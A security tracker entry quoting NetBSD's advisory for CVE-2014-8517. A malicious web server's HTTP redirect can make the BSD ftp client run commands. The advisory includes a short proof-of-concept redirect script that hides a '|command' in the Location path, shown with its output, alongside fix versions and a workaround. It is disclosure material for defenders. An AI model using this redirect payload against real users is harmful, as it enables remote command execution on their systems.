(NetBSD Issues Fix) BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System
SecurityTracker Alert ID: 1031154|
SecurityTracker URL: http://securitytracker.com/id/1031154
(Links to External Site)
Date: Nov 3 2014
Execution of arbitrary code via network, User access via network|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes |
A vulnerability was reported in some BSD-based FTP clients. A remote user can cause arbitrary commands to be executed on the target user's system.|
A remote FTP server can return a specially crafted HTTP redirect to a connected client to cause the target client to execute arbitrary commands on the target system.
The vulnerability can be triggered in response to an FTP command for an HTTP resource when '-o' (output file) is not specified.
NetBSD tnftp(1) is affected. In NetBSD, the vulnerability resides in 'src/usr.bin/ftp/fetch.c'.
Apple OS X is affected.
FreeBSD is affected.
OpenBSD is not affected.
Other BSD-based systems may be affected.
Jared Mcneill reported this vulnerability.
A remote user can cause arbitrary commands to be executed on the target connected user's system.|
NetBSD has issued a fix.|
The NetBSD advisory is available at:
Vendor URL: cxsecurity.com/issue/WLB-2014100174 (Links to External Site)
Access control error|
|Underlying OS: UNIX (NetBSD)|
|Underlying OS Comments: 5.1, 5.2, 6.0, 6.1|
This archive entry is a follow-up to the message listed below.|
Source Message Contents
Subject: NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver|
-----BEGIN PGP SIGNED MESSAGE-----
NetBSD Security Advisory 2014-013
Topic: ftp(1) can be made to execute arbitrary commands
by a malicious webserver
Version: NetBSD-current: source prior to Oct 27th, 2014
NetBSD 6.1 - 6.1.5: affected
NetBSD 6.0 - 6.0.6: affected
NetBSD 5.1 - 5.1.4: affected
NetBSD 5.2 - 5.2.2: affected
pkgsrc (net/tnftp) affected
Severity: remote command execution
Fixed: NetBSD-current: Oct 26th, 2014
NetBSD-7 branch: Oct 26th, 2014
NetBSD-6-0 branch: Oct 27th, 2014
NetBSD-6-1 branch: Oct 27th, 2014
NetBSD-6 branch: Oct 27th, 2014
NetBSD-5-2 branch: Oct 27th, 2014
NetBSD-5-1 branch: Oct 27th, 2014
NetBSD-5 branch: Oct 27th, 2014
pkgsrc: in version 20141031
Teeny versions released later than the fix date will contain the fix.
Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.
A malicious http server can cause ftp(1) to execute arbitrary commands.
This vulnerability has been assigned CVE-2014-8517.
If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not
After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).
Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.
a20$ ls -l
-rwxr-xr-x 1 root wheel 159 Oct 14 02:02 redirect
-rwxr-xr-x 1 root wheel 178 Oct 14 01:54 |uname -a
a20$ cat redirect
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
32 101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
Solutions and Workarounds
Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.
Get a new ftp binary:
VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp
or build a new ftp binary from source.
Affected file: src/usr.bin/ftp/fetch.c
Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
2014-11-03 Initial release
Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at
Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .
Copyright 2014, The NetBSD Foundation, Inc. All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)
-----END PGP SIGNATURE-----